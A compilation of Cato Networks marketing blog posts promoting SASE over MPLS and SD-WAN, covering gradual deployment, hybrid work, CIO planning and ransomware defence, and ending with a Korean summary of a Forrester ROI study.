For decades, enterprises have been stuck on complex and rigid architecture that has prevented them from achieving business agility and outdoing their competition. But now they don’t have to. SASE (Secure Access Service Edge), was recognized by Gartner in 2019 as a new category that converges enterprise networking and security point solutions into a unified,...
How to Gradually Deploy SASE in an Enterprise For decades, enterprises have been stuck on complex and rigid architecture that has prevented them from achieving business agility and outdoing their competition. But now they don’t have to. SASE (Secure Access Service Edge), was recognized by Gartner in 2019 as a new category that converges enterprise networking and security point solutions into a unified, cloud-delivered service. Gartner predicts that “by 2025, at least 60% of enterprises will have explicit strategies and timelines for SASE adoption encompassing user, branch and edge access, up from 10% in 2020.”SASE converges networking and security into a single architecture that is:
Cloud-nativeGlobally distributedSecureAnd covers all edges
Enterprises can deploy SASE at the flip of a switch or gradually. In this blog post, we list five different gradual deployment use cases that enterprise IT can incorporate. For more detailed explanations, you can read the in-depth ebook that this blog post is based on, “SASE as a Gradual Deployment”.
[boxlink link=”https://www.catonetworks.com/resources/5-questions-to-ask-your-sase-provider/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_questions_for_sase_provider”] 5 Questions to Ask Your SASE Provider | eBook [/boxlink]
Use Case #1: MPLS Migration to SD-WAN
SASE can support running MPLS alongside SD-WAN. In this first use case, enterprises leverage SASE’s SD-WAN functionalities, while turning off MPLS sites at their own schedule. Existing security and remote access solutions remain in place.
Use Case #2: Optimize Global Connectivity
SASE improves performance across global sites and WAN applications. Enterprises can use SASE for global connectivity and keep MPLS connections for critical WAN applications.
Use Case #3: Secure Branch Internet Access
SASE eliminates the need for edge security devices by including new technologies instead. For example, NGFW, IPS, ZTNA, and more. In this use case, MPLS is augmented with SASE security.
Use Case #4: Cloud Acceleration and Control
SASE’s global network of PoPs (Points of Presence) optimizes traffic in the network and to cloud data centers. Enterprises can leverage SASE instead of relying on the erratic Internet.
Use Case #5: Remote Access
SASE optimizes and secures remote traffic. By replacing VPNs with SASE, enterprises can ensure remote access to all edges through a secure network of global PoPs.
Introducing Cato: The World’s First SASE Service
Cato is the world’s first SASE platform, which supports gradual migration while connecting all network resources, including branches, mobile, remote employees, data centers, and more. Through a global and secure cloud-native network, Cato also offers:
Managed threat detection and responseEvent discoveryIntelligent last-mile managementHands-free managementSo much more
To learn more about MPLS to SASE deployment, read the ebook "SASE as a Gradual Deployment".
Until COVID-19, the majority of employees worked mainly from the office. But then, everything we knew was turned upside down, both professionally and personally. The workforce moved to and from the office, again and again, finally settling into a “hybrid workforce” reality. For IT teams, this abrupt change was unexpected. As a result, organizations did...
Your Post COVID Guide: Strategically Planning for the Hybrid Workforce Until COVID-19, the majority of employees worked mainly from the office. But then, everything we knew was turned upside down, both professionally and personally. The workforce moved to and from the office, again and again, finally settling into a “hybrid workforce” reality.
For IT teams, this abrupt change was unexpected. As a result, organizations did not have the infrastructure in place required to support remote users. At first, IT teams tried to deal with the new situation by stacking up legacy VPN servers. But these appliances did not meet agility, security and scalability demands.
Now, organizations need to find a different strategic solution to enable a productive hybrid workforce that can adapt to future changes. In this blog post, we cover the three main requirements of such a strategic solution and our technological recommendations for answering them.
(For a more in-depth analysis, you can read the ebook “The Hybrid Workforce: Planning for the New Working Reality”, which this blog post is based on.)
[boxlink link="https://www.catonetworks.com/resources/the-hybrid-workforce-planning-for-the-new-working-reality/?utm_source=blog&utm_medium=top_cta&utm_campaign=hybrid_workforce"] The Hybrid Workforce: Planning for the New Working Reality | EBOOK [/boxlink]
Requirement #1: Seamless Transition Between Home and Office
Most traditional infrastructure, namely MPLS, SD-WAN and NGFW/UTM, is focused on the office. However, there is no infrastructure that extends to remote work and home environments. This extension is required to enable a remote workforce.
Solution #1: ZTNA and SASE
ZTNA (Zero Trust Network Access) and SASE (Secure Access Service Edge) decouple network and security capabilities from physical appliances. Instead, they provide them in the cloud. This solution converges all infrastructure into a single platform that is available to everyone, everywhere.
Requirement #2: Scalable and Globally Distributed Remote Access
Today’s VPNs are appliance-centric, making them resource-intensive when scaling and maintaining them.
Solution #2: Remote Access as a Service
A global cloud service can provide remote access to a significant user base. This will free up IT resources for infrastructure management.
Requirement #3: Optimization and Security for All Traffic
Having remote access is not enough. Teams also need traffic optimization and security for performance and preventing breaches.
Solution #3: A Single Solution for All Needs
Some remote access solutions include optimization and security for all traffic types. This can be done through WAN optimization, cloud acceleration and threat prevention.
A global and agile network and security infrastructure can serve your hybrid workforce and help you prepare for whatever is next. Read the ebook to learn how.
A CIO position is exciting but also challenging, especially if it’s your first role… And, if you don’t plan what you want to accomplish, you might find yourself putting out fires or chasing your own tail. Learn how to navigate the first 100 days of your important new role, in our helpful online guide. Use...
How to Succeed as a CIO in 100 Days A CIO position is exciting but also challenging, especially if it’s your first role... And, if you don’t plan what you want to accomplish, you might find yourself putting out fires or chasing your own tail. Learn how to navigate the first 100 days of your important new role, in our helpful online guide. Use it to achieve professional success and establish your position as an invaluable business leader. (And, for more in-depth explanations, tips and stats, check out the e-book this blog post is based on.)
Phase 1: Get to Know the Organization and the Team (3 weeks)
The first step at a new company is to get to know the people and learn the company culture. Spend time with your team, stakeholders and company leadership. Use this opportunity to learn about the business, IT’s contribution and where IT fits in the business’s future goals. During these talks, map out any potential gaps or weaknesses you can identify.
To see example questions to ask during these sessions, check out the eBook.
Phase 2: Learn the IT and Security Infrastructure (3 weeks)
Once you’ve understood the expectations from your department, it’s time to learn the network infrastructure and architecture.
Take scope of:
Technologies in use
The delivery model
On-site and off-site work
Digital transformation status
Similar to phase one, start mapping out any network strengths and weaknesses.
[boxlink link="https://www.catonetworks.com/resources/your-first-100-days-as-cio-5-steps-to-success/?utm_source=blog&utm_medium=top_cta&utm_campaign=first_100_days_cio"] Your First 100 Days as CIO: 5 Steps to Success | EBOOK [/boxlink]
Phase 3: Set a Strategy and Goals (2 weeks)
Finally, now is the time to determine your strategy for the upcoming year.
Organize your notes from phases 1 and 2.
Research new technologies, tools, trends and capabilities that could be relevant to your industry and requirements.
Map out your department’s strengths, weaknesses, threats and opportunities.
Determine your vision and mission statement.
Define your objectives.
Phase 4: Incorporate Digital Transformation (2 weeks)
According to McKinsey Global, following Covid-19, companies are accelerating digitization by three to seven years, acting even 40 times faster than expected! This means that CIOs who want to be perceived as future leaders need to keep up to date with digital technologies.
Look beyond traditional architectures and into trends like cloudification, convergence and mobility. According to Lars Norling, Director of IT Operations from ADB Safegate “Our analysis clearly showed the shift in the IT landscape, namely extended mobility and the move towards providing core services as cloud services. This led us to look outside of the box, beyond traditional WAN architectures.”
Gartner identifies SASE (Secure Access Service Edge) as the leading transformative technology today. SASE converges network and security into one global cloud service while reducing IT overhead, ensuring speed and performance and incorporating the latest security solutions.
Phase 5: Set Priorities (2 weeks)
Are you excited to get started on executing your plan? It’s almost time to do so. But first, prioritize the activities you want to take on, based on business requirements, ROI, urgency and risks.
The steps above are intended to help you make days 101 and onwards a smashing success. So go over your plans, take a deep breath and get started. Good luck!
To learn more about digital transformation and SASE, let’s talk.
Read more about your first 100 days in the ebook, “Your First 100 Days as CIO: 5 Steps to Success”.
MPLS (Multiprotocol Label Switching) has been an industry-standard in enterprise networking for decades. But with modern enterprises relying more and more on public cloud services like Office 365, Salesforce and SAP Cloud, is MPLS enough? Perhaps there’s another solution that can meet the capacity, security, and agility requirements of the next-generation enterprise network. 5 Considerations...
What Others Won’t Tell You About MPLS MPLS (Multiprotocol Label Switching) has been an industry-standard in enterprise networking for decades. But with modern enterprises relying more and more on public cloud services like Office 365, Salesforce and SAP Cloud, is MPLS enough? Perhaps there’s another solution that can meet the capacity, security, and agility requirements of the next-generation enterprise network.
5 Considerations for Evaluating MPLS and Its Alternatives
1. Agility: Can Your Network Move at the Speed of Business?
Modern enterprises need a solution that enables them to expand their business quickly and connect new sites to their existing networks. But traditional MPLS requires rolling out permanent infrastructure, which can take months and keeps businesses dependent on telco service and support.
2. Cost: Is Your Cost Per Megabit Too High?
The modern enterprise network is internet-bound, which makes it bandwidth-intensive. Enterprises need a solution that is priced in an internet-friendly manner since counting every megabit is counter-productive. But MPLS costs are megabit-based, and each megabit is pricey. Redundant circuits, resilient routing and WAN optimization drive the bill even higher.
3. Flexibility: Can The Business Transition Between On and Off-site Work?
New, post-pandemic workplaces have to be able to automatically transition between remote and on-site work. But in case of connectivity issues, transitioning to MPLS backups could cause significant delays that impede productivity.
4. Security: Can Enterprise Users Access Resources Anywhere?
To support remote work and a distributed workforce, resources, users, data and applications need to be secured wherever they are. But MPLS VPNs are hard to manage and backhauling traffic to the data centers adds latency, making the network vulnerable.
5. Management: Do You Have Visibility and Control of Your Network?
Modern businesses need co-managed networks so they can have visibility and control without having to take care of all the heavy lifting. But MPLS requires businesses to control the entire network or hand it all over to telcos.
[boxlink link="https://www.catonetworks.com/resources/what-telcos-wont-tell-you-about-mpls/?utm_source=blog&utm_medium=top_cta&utm_campaign=other_mpls"] What Others Won’t Tell You About MPLS | Download eBook [/boxlink]
Is SD-WAN the Solution for MPLS’s Shortcomings?
SD-WAN can replace some types of MPLS traffic, saving businesses from many of MPLS’ costs. However, MPLS doesn’t answer all business needs, including:
Cloud - SD-WAN focuses on physical WAN.
Security - SD-WAN employs only basic security features.
Remote and Hybrid Work - SD-WAN is a branch-oriented solution that cannot support remote work on its own.
Visibility - SD-WAN requires adding more vendors, which creates fragmented visibility.
How SASE Answers All Future WAN Needs
The solution for all future enterprise network needs is a converged solution that includes SD-WAN, a global backbone, pervasive security, and remote access in a single cloud offering.
A SASE platform offers just that:
A single platform for all capabilities, which can be activated separately at the flip of a switch.
A global WAN backbone over the cloud, ensuring traffic runs smoothly with minimal latency across global PoPs.
A unified security-as-a-service engine by converging ZTNA with SD-WAN.
A single pane of glass for all policies, configurations, monitoring, and analytics.
Flexible management - self-service, co-managed, or fully managed.
Read more about MPLS vs. SASE in the complete eBook, What Others Won’t Tell You About MPLS.
With corporations paying ransoms of seven figures and upwards to restore business continuity, cyber attackers have turned to ransomware as a lucrative income. But in addition to the immediate cost, which could reach millions of dollars, ransomware will also leave organizations with significant long-term damage. This blog post will explain the four main areas of...
How to Protect from Ransomware with SASE With corporations paying ransoms of seven figures and upwards to restore business continuity, cyber attackers have turned to ransomware as a lucrative income. But in addition to the immediate cost, which could reach millions of dollars, ransomware will also leave organizations with significant long-term damage. This blog post will explain the four main areas of impact of ransomware on organizations, and how Cato SASE Cloud can help prevent ransomware and protect businesses.
This blog post is based on the e-book “Ransomware is on the Rise - Cato’s Security-as-a-Service Can Help”.
4 Ways Ransomware Affects Organizations
1. Immediate Loss of Productivity
Organizations depend almost entirely on data and applications for their daily operations, including making payments, creating products and delivering and shipping them. If this comes to a halt, the loss of productivity is enormous. For some global enterprises, this could even mean losing millions of dollars per hour. Recovering backups and attempting data recovery could take IT teams weeks of work. To restore productivity, some businesses prefer to pay the ransom and get operations back on track.
2. Data Encryption
According to Cybercrime Magazine, the global cost of ransomware damages will exceed $20 billion in 2021 and $265 Billion by 2031. One of the ways attackers gain these amounts is encrypting organizational data, and requiring a payment for instructions on how to decrypt it. To motivate victims to pay, attackers might threaten to destroy the private key after a certain amount of time, or increase the price as time passes.
To view the entire list and additional ways ransomware impacts organizations, check out the ebook.
[boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help/?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware_ebook"] Ransomware is on the Rise – Cato’s Security as a Service can help | eBook [/boxlink]
How Cato SASE Cloud Prevents Ransomware
By converging network and security into a global, cloud-native service, Cato’s SASE platform provides visibility into traffic, edges and resources, which enables building a comprehensive and unique security solution that protects from malware while eliminating false positives.
Here’s are six ways Cato SASE Cloud protected organizations from ransomware:
1. Reputation Data & Threat Intelligence
Cato leverages threat intelligence feeds from open-source, shared communities and commercial providers. In addition, after finding that 30% of feeds contain false positives or miss IoCs, Cato built a complementing system that uses ML and AI to aggregate records and score them.
2. Blocking Command and Control Communication
Cato IPS prevents delivery of ransomware to machines, which is the primary way perpetrators gain hold of systems prior to the attack. If an attacker is already inside the network, Cato prevents the communication that attackers use to encrypt files and data.
3. Blocking Suspicious SMB File Activity
Cato IPS detects and blocks irregular network activity, which could be the result of attackers using SMB to rename or change extensions of encrypted files.
4. Zero Trust Network Access
Cato SASE Cloud provides a zero-trust approach to ensure users and hosts can only access applications and resources they are authorized for. This reduces the attack surface, limiting ransomware's ability to spread, encrypt and exfiltrate data.
5. Stopping Known and Zero-Day Threats
Leveraging machine learning, Cato’s advanced anti-malware solution defends against unknown threats and zero-day attacks, and is particularly useful against polymorphic malware designed to evade signature-based inspection engines.
6. An IPS that Sees the Full Picture, Not a Partial One
Cato’s IPS has unique capabilities across multiple security layers, including: layer-7 application awareness, user identity awareness, user/agent client fingerprint, true file type, target domain/IP reputation, traffic attributes, behavioral signature and heuristic, and more.
Scale Your Security Team with Cato MDR
Cato can offload the resource-intensive process of detecting compromised endpoints from organizations’ already-busy IT and security teams. This eliminates the need for additional installations as Cato already serves as the customer’s SASE platform, supplying unparalleled visibility into all traffic from all devices.
Automated Threat Hunting
Network-Level Threat Containment
Reporting & Tracking
Cato MDR service can help you identify and contain ransomware and suspicious activities before they activate and impact your business. Through lateral movement detection and baselining host behavior, Cato MDR service gives your network an extra set of eyes to detect, isolate and remediate threats. Contact us to learn more.
See the e-book “Ransomware is on the Rise - Cato’s Security-as-a-Service Can Help”.
The SD-WAN contract renewal period is an ideal time to review whether SD-WAN fits into your future plans. While SD-WAN is a powerful and cost-effective replacement for MPLS, enterprises need to make sure it answers their evolving needs, like cloud infrastructure, mitigating cyber risks, and enabling remote access from anywhere. 4 Things to Consider Before...
Renewing Your SD-WAN? Here’s What to Consider The SD-WAN contract renewal period is an ideal time to review whether SD-WAN fits into your future plans. While SD-WAN is a powerful and cost-effective replacement for MPLS, enterprises need to make sure it answers their evolving needs, like cloud infrastructure, mitigating cyber risks, and enabling remote access from anywhere.
4 Things to Consider Before Renewing your SD-WAN Contract
Consideration #1: Security
Enterprises need to reduce their attack surface, ensuring that only required assets are accessible, and only to authorized users.
Questions to ask yourself:
Does my SD-WAN solution include advanced security models like ZTNA?
How does my SD-WAN’s security solution integrate with other point solutions?
Does my SD-WAN solution offer threat prevention and decryption?
Consideration #2: Cloud Optimization
Traffic from and to the cloud needs to be optimized in terms of performance and security.
Questions to ask yourself:
How does my SD-WAN solution manage multi-cloud environments?
Does my SD-WAN solution provide migration capabilities?
Can my SD-WAN solution scale according to my needs?
[boxlink link="https://www.catonetworks.com/resources/5-things-sase-covers-that-sd-wan-doesnt/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_sd-wan_gaps_answered_by_sase"] 5 Things SASE Covers that SD-WAN Doesn’t | EBOOK [/boxlink]
Consideration #3: Global Access
Enterprises need predictable and reliable transport to connect global locations to the cloud and data centers.
Questions to ask yourself:
Does my SD-WAN solution provide a global infrastructure to ensure low latency and optimized routing?
How does my SD-WAN solution ensure secure global access?
Will my SD-WAN solution provide an alternative in case of a network outage?
Consideration #4: Remote Access
Remote access for employees and external vendors needs to be supported to ensure business agility.
Questions to ask yourself:
How does my SD-WAN solution secure remote users?
How does my SD-WAN solution ensure remote users get optimized performance?
Does my SD-WAN solution protect from supply chain attacks?
SASE, the Next Step After SD-WAN
SASE (Secure Access Service Edge) provides value in areas where SD-WAN lacks. SASE is the next step after SD-WAN because it provides enterprises with all the point solutions’ advantages, but without the friction of integrating and maintaining them. SASE is a single platform that converges SD-WAN and network security into a single, cloud-native global service.
In fact, according to Gartner, by 2024, more than 60% of SD-WAN customers will have implemented a SASE architecture, compared to approximately 35% in 2020.
How SASE Answers Network and Security Requirements
Let’s see how SASE provides a solution for each of the considerations above.
Security – SASE’s converged, full security stack extends advanced and up-to-date security measures to all edges.
Cloud optimization – SASE provides frictionless and optimized cloud service with immediate scaling capabilities everywhere.
Global access – SASE PoPs deliver the service to users and locations that are nearest to them, as well as accelerating east-west and northbound traffic to the cloud.
Remote access – SASE delivers secure remote access, with the ability to instantly scale to address the new work-from-anywhere reality.
SD-WAN vs. SASE
After SD-WAN solves the branch-data center-edge challenge, SASE enables enterprises to globally expand their environment to the cloud in an optimized and secure manner.
Let’s see how the two compare:
How to Get Started with SASE
Cato is the world’s first SASE platform, converging SD-WAN and network security into a global cloud-native service. Cato optimizes and secures application access for all users and locations. Using Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure branch Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever’s next. Start now.
When SD-WAN emerged a decade ago, it quickly became a viable and cost-effective solution to MPLS. Back then, it was the technology for digital transformation. But today, enterprises have more advanced network and security needs, and IT leaders are realizing that SD-WAN doesn’t address them. What’s the alternative? According to Gartner, it’s SASE (Secure Access...
5 SD-WAN Gaps that are Answered by SASE When SD-WAN emerged a decade ago, it quickly became a viable and cost-effective solution to MPLS. Back then, it was the technology for digital transformation. But today, enterprises have more advanced network and security needs, and IT leaders are realizing that SD-WAN doesn’t address them.
What’s the alternative? According to Gartner, it’s SASE (Secure Access Service Edge), an architecture that converges SD-WAN and security point solutions into a unified and cloud-native service. Gartner predicts that by 2024 more than 60% of SD-WAN customers will implement a SASE architecture.
This blog post will help you understand which SD-WAN gaps are answered by SASE, and how they are reconciled. To read the entire analysis, you can read the e-book.
SASE vs. SD-WAN for Enterprises
Let’s look at five network and security considerations modern enterprises have and how SD-WAN and SASE each respond to them.
1. Advanced Security
Enterprises today must prepare for cybersecurity attacks by implementing security solutions that will protect their critical applications. With SD-WAN, IT teams are required to add additional appliances, like NGFW, IPS and SWG. This increases the cost of deployments and complicates maintenance. SASE, on the other hand, has a built-in network security stack that secures all edges and all locations.
2. Remote Workforce
The hybrid work model is here to stay. Employees will continue to connect from home or other external locations, and third parties require access to the network as well. SD-WAN does not support this type of connectivity, since it was designed for replacing MPLS between physical locations. SASE, on the other hand, connects remote users from anywhere to the nearest PoP (point of presence), for optimized and secure access.
[boxlink link="https://www.catonetworks.com/resources/5-things-sase-covers-that-sd-wan-doesnt/?utm_source=blog&utm_medium=top_cta&utm_campaign=5_sd-wan_gaps_answered_by_sase"] 5 Things SASE Covers that SD-WAN Doesn’t | EBOOK [/boxlink]
3. Cloud Readiness
Cloud connectivity is essential for business agility, global connectivity and access to business applications. SD-WAN is limited in cloud-readiness, and requires management and integration of proprietary appliances and expensive cloud connectivity solutions. SASE, on the other hand, is based on cloud datacenters that are connected to the SASE cloud. In addition, cloud applications don’t require integration and application traffic from edges is sent to cloud instances.
4. Global Performance
Global connectivity is the backbone of businesses, but SD-WAN provides connectivity through third-party backbone providers, which are not always reliable. SASE has a private global backbone that is WAN optimized.
5. Simple Management
Work has become more complicated and noisy than ever, so IT teams need a solution that will reduce overhead, not add to it. SD-WAN and security solutions require IT teams to manage, maintain and troubleshoot functions separately. SASE converges all functions, providing visibility and simple, centralized management.
Enterprises today need their IT and security to support and accelerate the development and delivery of new products, and to help them respond to business changes. SASE lowers business costs, complexity and risks by connecting network and security into a holistic platform.
To learn more about how SASE can replace SD-WAN and help IT teams prepare for the needs and opportunities of tomorrow, read the e-book. To get a consultation and understand how SASE can answer your specific needs, contact us.
In today’s business climate, standing still is the kiss of death. Businesses that wish to remain competitive, increase profit margins and improve customer success need to adopt new technologies and discover new markets. To support these efforts, IT teams need to be prepared for digital change – by making a strategic leap towards a network...
The ROI of Doing Nothing: How and Why IT Teams Should Strategically Plan In today’s business climate, standing still is the kiss of death. Businesses that wish to remain competitive, increase profit margins and improve customer success need to adopt new technologies and discover new markets. To support these efforts, IT teams need to be prepared for digital change - by making a strategic leap towards a network and security architecture that enables rapid and agile digital transformation. After all, today’s point solutions that only address cloud migration, remote work or certain security threats, will only remain relevant for so long.
This blog post breaks down the considerations and requirements of strategic change, while comparing two courses of action - transforming early or waiting for the last minute - and proposes a plan for gradual adoption of SASE.
If you’d like to read a more in-depth breakdown of the process, with calculations and user testimonials, you’re welcome to view the e-book that this blog is based on.
5 Expected Network Demands in the Near Future
The first step to take when deciding how to address network changes is to understand what to expect, i.e why IT teams even need to change course. Let’s look at five network demands IT teams will probably encounter in the (very) near future.
1. Accelerated Application Migration to the Cloud
As more teams require access to applications and infrastructure in the cloud, IT teams need to find ways to manage user and service access, deal with “Shadow IT” and enforce cloud policies from legacy networks. This is essential for ensuring secure connectivity and business continuity.
2. Rising MPLS Bandwidth Costs
MPLS is expensive and eats up a large portion of IT spend. As applications generate more traffic, video and data, costs are expected to go up even more. IT teams need to find a more cost-effective replacement, or get a higher budget.
3. Connecting Remote Workers
Remote and hybrid work are expected to stay long after Covid-19. But, ensuring performance, security and user experience for WFA users with traditional remote-access VPN is mission impossible for IT teams. This requires a long-term solution that is both stable and reliable.
4. Connecting the Supply Chain
The new workforce consists of contractors, consultants and other service providers that require network access. However, connecting these outsourced suppliers also creates security threats. IT teams need to find a solution that enables external collaboration without the risk.
5. Rapid Global Expansion
Organizations are growing and expanding, both organically and through acquisitions. Many times, expansion takes place into new geographies and locations. IT teams are required to integrate new employees and users as quickly and seamlessly as possible, within hours and days, not months.
New Networking Demands Create New Organizational Challenges
Now that we’ve listed these network challenges, let’s understand what they mean for IT teams, on an organizational level.
Upgrades and Replacements for Hardware Appliances - More users and traffic mean more required network bandwidth. Once existing appliances reach their limit, they will need to be updated, which is both expensive and time-consuming.
Increased Cost of Human Resources - Securing and managing applications and services requires human talent and time. This means training, hiring or off-loading to a third party.
The Telco Headache - Managing a relationship with a Telco can be frustrating and cause major overhead. As needs grow, it will become even more difficult to find the right person who will take responsibility, answer tickets and respond to requests in a timely manner.
[boxlink link="https://www.catonetworks.com/resources/the-roi-of-doing-nothing/?utm_source=blog&utm_medium=top_cta&utm_campaign=roi_of_doing_nothing"] The ROI of Doing Nothing | EBOOK [/boxlink]
The Solution: Build a Digital Strategy and Act On It
With so many complicated networking challenges around the horizon, the question isn’t whether to transform, only when. To answer this question, it’s important to have a strategy in place. This strategy will allow you to address future challenges with ease and expertise, while eliminating headaches. Let’s look at two ways to build and act on a digital strategy.
The Cost of Acting Now vs. Acting Later
Businesses today face two options. For simplicity, let’s divide them into two stages: 1 and 2.
Stage 1 businesses are those that spend a significant, yet manageable, amount of their budget on MPLS. On the contrary, stage 2 companies spend an extremely large amount of money on MPLS, as new locations and workers that need to connect cloud applications and locations are added to the network.
IT teams can transform technologically when businesses are either in stage 1 or stage 2. By transforming early, problems of digital transformation can be easily avoided. Instead of putting out fires, stage 1 companies have time to plan, think through issues and devise a strategy for today and tomorrow’s requirements.
Stage 2 companies, on the other hand, are in the worst position to make a transition. This is because the money, resources and time spent on legacy solutions will determine how much money, resources and time they will have for new challenges, impacting the success and ROI of the new solution. Putting out fires is the worst reason to make a strategic decision.
The SASE Solution To Rapid Digital Transformation
According to Gartner, “Current network strategy architectures were designed with the enterprise data center as the focal point for access needs. Digital business has driven new IT architectures like cloud and edge computing and work-from-anywhere initiatives, which have in turn, inverted access requirements, with more users, devices, applications, services and data located outside of an enterprise than inside. The Covid-19 pandemic accelerated these trends.”
The industry has rallied around Gartner’s SASE (Secure Access Service Edge) architecture as the best solution to meet the challenges introduced by cloud, mobility and other dynamic shifting network traffic (which we described above).
This is because SASE provides:
Access to any resource, including cloud applications and the Internet
A broad range of capabilities - NGFW, IPS, MDR and more
Scalability, without rigid constraints
5 Steps to SASE Adoption:
Think Strategically While Acting Gradually
We’ve determined that the current network is the problem and that SASE is the solution. This begs the question, how can IT teams adopt SASE without disrupting the business?
SASE can be adopted gradually and grow incrementally as current MPLS contracts expire. Here are the five steps to take to enable digital transformation and prepare your network for “whatever’s next”:
Step 1: No Change - Deploy SD-WAN devices to connect certain sites to MPLS and the Internet. The rest of the network and MPLS connections remain unmodified.
Step 2: Complement MPLS - Deploy SASE where MPLS is unavailable or too expensive, to improve connectivity to WAN applications.
Step 3: Introduce Security - Deploy functions like NGFW, Web gateways IPS, anti-malware, zero trust as existing applications meet end-of-life or can’t scale, or to new edges.
Step 4: Optimize Datacenter Access - Implement advanced routing to benefit SaaS applications instead of having them rely on the Internet, which is erratic.
Step 5: Connect Remote Users - Bring mobile and WFA users to the SASE cloud for optimized performance with ZTNA, while removing VPNs, servers, and other devices.
Conclusion: Time to Spring Into Action
Act now. You can start with a plan, a partial transition or testing, but don’t wait. By doing so, you will prevent:
High MPLS costs
Management overhead of siloed appliances and external services
Skyrocketing costs of complex MPLS networks
Constrained resources when MPLS costs rise
IT challenges to support network and security complexity
Slow and bulky networks that can’t meet digital transformation requirements
Low ROI following network and digital transformation
To learn more about the considerations and see a breakdown of transition costs and savings, access the ebook The ROI of Doing Nothing. To see how organizations can save money and achieve more than 200% ROI with Cato SASE Cloud, read the Forrester TEI (Total Economic Impact) Report.
SD-WAN networks provide multiple benefits to organizations, especially when compared to MPLS. SD-WAN improves cloud application performance, reduces WAN costs and increases business agility. However, SD-WAN also has some downsides, which modern organizations should take into consideration when choosing SD-WAN or planning its implementation. This blog post lists the top considerations for enterprises that are...
Is SD-WAN Enough for Global Organizations? SD-WAN networks provide multiple benefits to organizations, especially when compared to MPLS. SD-WAN improves cloud application performance, reduces WAN costs and increases business agility. However, SD-WAN also has some downsides, which modern organizations should take into consideration when choosing SD-WAN or planning its implementation.
This blog post lists the top considerations for enterprises that are evaluating and deploying SD-WAN. It is based on the e-book “The Dark Side of SD-WAN”.
Last Mile Considerations
SD-WAN provides organizations with flexibility and cost-efficiency compared to MPLS. For the last mile, SD-WAN users can choose their preferred service, be it MPLS or last-mile services like fiber, broadband, LTE/4G, or others.
When deciding which last-mile solution to choose, we recommend taking the following criterion into consideration:
Redundancy (to ensure availability)
Learn more about optimizing the last mile.
Middle Mile Considerations
MPLS provides predictability and stability throughout the middle mile. When designing the SD-WAN middle mile, organizations need to find a solution that provides the same capabilities.
Relying on the Internet is not recommended, since it is unpredictable. The routers are stateless and control plane intelligence is limited, which means routing decisions aren’t based on application requirements or current network levels. Instead, providers’ commercial preferences often take priority.
Learn more about reliable global connectivity.
Distributed architectures require security solutions that can support multiple edges and datacenters. The four main options enterprises have today are:
The SD-WAN Firewall
- Built into the SD-WAN appliance
- Do not inspect user traffic
Purchasing a Unified Threat Management Device
- Inspects user traffic
- Requires a device for each location, which is costly and complex
- Eliminated firewalls at every edge
- Based on multiple devices - the datacenter firewall, the SD-WAN and the cloud security device. This is also costly and complex.
A Converged Solution
SASE (Secure Access Service Edge) - converges SD-WAN at the edge and security in the middle, with one single location for policy management and analytics.
Cloud Access Optimization Considerations
In a modern network, external datacenters and cloud applications need to be accessed by the organization’s users, branches and datacenters. Relying on the Internet is too risky in terms of performance and availability.
It is recommended to choose a solution that offers premium connectivity or to choose a cloud network that egresses traffic from edges as close as possible to the target cloud instance.
[boxlink link="https://www.catonetworks.com/resources/the-dark-side-of-sd-wan-are-you-prepared?utm_source=blog&utm_medium=top_cta&utm_campaign=dark_side_ebook"] The Dark Side of SD-WAN | Read The eBook [/boxlink]
Network Monitoring Considerations
When monitoring the network, enterprises need to be able to identify issues in a timely manner, open tickets with ISPs and work with them until the issue is resolved.
It is recommended to set up 24/7 support and monitoring to orchestrate this and prevent outages that could impact the business.
Considerations When Managing the SD-WAN
Transitioning to SD-WAN requires deciding how to manage relationships with all the last-mile ISPs, as well as the network itself. You can manage these internally or outsource to providers.
Ask yourself the following questions:
Is it easier to manage multiple providers directly or through a single external aggregator?
How much control do you need over deployment and integrations?
What are your priorities for your internal talent’s time and resources?
Organizations today need to shift to support the growing use of cloud-based applications and mobile users. SD-WAN is considered a viable option by many. But is it enough? Use this blog post to evaluate if and how to implement SD-WAN. To get more details, read the complete e-book.
To learn more about SASE, let’s talk.
Cato Networks(케이토 네트웍스)는 레거시 IT 접근 방식과 관련된 복잡성, 비용, 위험을 제거하는 클라우드 네이티브 아키텍처를 통해 차세대 네트워킹과 네트워크 보안을 제공한다는 비전에 따라 설립되었습니다. IT 팀의 작업 없이 새로운 기능을 신속하게 배포하고 보안 태세를 유지하는 것을 목표로 합니다. 궁금한 점은 목표 달성 여부였습니다. 당사와 당사의 잠재 고객이 Cato Networks의 잠재적 영향과 ROI를 측정할 수 있도록,...
총 경제 효과(Total Economic Impact™) 연구: Cato, 246% ROI 및 433만 달러 NPV 제공 Cato Networks(케이토 네트웍스)는 레거시 IT 접근 방식과 관련된 복잡성, 비용, 위험을 제거하는 클라우드 네이티브 아키텍처를 통해 차세대 네트워킹과 네트워크 보안을 제공한다는 비전에 따라 설립되었습니다. IT 팀의 작업 없이 새로운 기능을 신속하게 배포하고 보안 태세를 유지하는 것을 목표로 합니다.
궁금한 점은 목표 달성 여부였습니다.
당사와 당사의 잠재 고객이 Cato Networks의 잠재적 영향과 ROI를 측정할 수 있도록, 총 경제 효과(Total Economic Impact, TEI) 연구를 실시해줄 것을 포레스터 컨설팅(Forrester Consulting)에 의뢰했습니다. 솔직히 말하자면, 기업들이 Cato SASE Cloud를 통해 달성한 성공은 우리에게도 매우 놀라운 것이었습니다.
이 연구는 Cato Networks가 비용 감소, 간접비 제거, 오래된 시스템 폐기, 보안 강화, 성능 향상, 더 높은 직원 사기 형성에 어떻게 도움이 되는지 보여 줍니다.
포레스터 컨설팅의 주요 연구 결과에 따르면, Cato를 이용할 때 복합 조직은 다음과 같은 이점을 얻을 수 있습니다.
433만 달러 NPV
6개월 이내 회수
운영 및 유지관리 감소로 380만 달러 절약
새로운 사이트에서 Cato 구성 시간을 단축하여 약 44,000달러 절약
Cato로 대체되는 시스템의 폐기로 220만 달러 절약
시간 및 운송 비용 절감
